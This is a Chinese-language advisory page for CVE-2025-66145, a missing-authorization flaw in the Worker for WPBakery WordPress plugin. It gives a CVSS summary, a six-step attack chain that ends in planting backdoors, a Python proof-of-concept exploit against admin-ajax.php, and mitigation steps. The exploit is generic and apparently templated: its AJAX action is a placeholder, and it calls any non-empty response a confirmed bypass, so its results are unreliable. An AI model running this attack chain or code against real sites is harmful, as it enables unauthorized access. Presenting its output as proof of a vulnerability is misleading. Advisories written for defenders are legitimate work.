CVE-2025-66145 WordPress Worker for WPBakery插件缺失授权访问控制漏洞

漏洞信息

漏洞编号

CVE-2025-66145

漏洞类型

缺失授权/访问控制

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Worker for WPBakery (WordPress Plugin)

漏洞概述

CVE-2025-66145是WordPress插件Worker for WPBakery中发现的一个中等严重性安全漏洞。该漏洞类型为Missing Authorization（缺失授权），存在于插件的访问控制机制中。由于插件对某些敏感功能的访问控制配置不当，低权限用户（如订阅者角色）可能能够执行超出其权限范围的操作。攻击者可利用此漏洞访问或修改本应仅限高权限用户（如管理员）才能访问的功能和数据。该漏洞影响Worker for WPBakery 1.1.1及以下版本。鉴于该插件常用于WordPress网站页面构建，漏洞可能影响大量使用该插件的网站安全。网站管理员应尽快更新到最新版本或采取临时缓解措施。

技术细节

该漏洞属于Broken Access Control（访问控制失效）类别，具体表现为插件在实现某些功能时未正确验证用户权限。Worker for WPBakery插件在处理WPBakery页面构建器相关功能时，可能存在以下问题：1) 未对特定端点或函数调用进行充分的权限检查；2) 允许低权限用户访问本应需要管理员权限的AJAX动作或REST API端点；3) 访问控制逻辑存在缺陷，可被绕过。攻击者可通过构造特定的HTTP请求（如AJAX请求或REST API调用），在未持有相应权限的情况下触发敏感功能。漏洞的利用不需要复杂的攻击技术，但需要对WordPress插件结构和请求机制有一定了解。CVSS 3.1向量显示攻击复杂度低（AC:L），无需特殊权限提升（PR:L），通过网络即可发起攻击（AV:N）。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标WordPress网站并确认安装了Worker for WPBakery插件（版本<= 1.1.1）

STEP 2

步骤2

获取低权限账户：攻击者注册为订阅者角色或获取现有低权限用户凭据

STEP 3

步骤3

识别漏洞端点：通过分析插件代码或自动化工具识别缺乏权限检查的AJAX端点或REST API路由

STEP 4

步骤4

构造恶意请求：构造包含敏感操作的HTTP请求（如admin-ajax.php调用），绕过访问控制检查

STEP 5

步骤5

执行未授权操作：发送请求后，服务器因缺少权限验证而执行敏感功能，如数据读取、修改或配置变更

STEP 6

步骤6

持久化或进一步利用：攻击者可能利用获取的访问权限进一步提升权限或植入后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66145 PoC - Worker for WPBakery Broken Access Control
# This PoC demonstrates accessing admin-only functionality as low-privilege user

import requests
import sys

# Configuration
target_url = "http://target-wordpress-site.com"
username = "low_privilege_user"
password = "user_password"

def get_wp_nonce(url, cookie):
    """Extract security nonce from WordPress admin page"""
    response = requests.get(f"{url}/wp-admin/admin.php?page=vc-wpbakery", cookies=cookie)
    # Search for _wpnonce in response
    import re
    nonce_match = re.search(r'name="_wpnonce" value="([a-z0-9]+)"', response.text)
    if nonce_match:
        return nonce_match.group(1)
    return None

def exploit_cve_2025_66145():
    """
    Exploit Missing Authorization in Worker for WPBakery plugin
    The plugin fails to properly check user capabilities before executing
    privileged actions accessible via AJAX endpoints.
    """
    session = requests.Session()
    
    # Step 1: Login as low-privilege user (subscriber role)
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    login_response = session.post(f"{target_url}/wp-login.php", data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    
    print("[+] Logged in as low-privilege user")
    
    # Step 2: Identify vulnerable AJAX endpoint
    # Worker for WPBakery plugin AJAX actions without capability checks
    vulnerable_endpoints = [
        '/wp-admin/admin-ajax.php',
    ]
    
    # Step 3: Craft malicious request to trigger unauthorized action
    # Example: Access admin-only worker functionality
    exploit_data = {
        'action': 'worker_wpbakery_sensitive_action',  # Specific action varies
        '_wpnonce': get_wp_nonce(target_url, session.cookies.get_dict()),
        # Additional parameters depending on vulnerable function
    }
    
    # Step 4: Send exploit request
    exploit_response = session.post(
        f"{target_url}/wp-admin/admin-ajax.php",
        data=exploit_data
    )
    
    if exploit_response.status_code == 200:
        print("[+] Exploit request sent successfully")
        print(f"[+] Response: {exploit_response.text[:200]}")
        
        # Check if unauthorized access was successful
        if 'success' in exploit_response.text or len(exploit_response.text) > 0:
            print("[!] Access control bypass confirmed - unauthorized access possible")
            return True
    
    print("[-] Exploit may have failed or target not vulnerable")
    return False

if __name__ == "__main__":
    print("CVE-2025-66145 PoC - Worker for WPBakery Missing Authorization")
    exploit_cve_2025_66145()

影响范围

Worker for WPBakery <= 1.1.1

防御指南

临时缓解措施

立即采取以下临时缓解措施：1) 如果无法立即更新插件，可使用安全插件（如Wordfence）配置防火墙规则阻止可疑的AJAX请求；2) 限制或禁用订阅者角色的AJAX访问权限；3) 审查并限制wp-admin/admin-ajax.php的访问来源；4) 监控网站日志关注异常的访问模式；5) 考虑临时禁用Worker for WPBakery插件直至更新完成；6) 确保所有用户使用强密码并启用双因素认证；7) 定期备份网站数据以便在发生安全事件时快速恢复。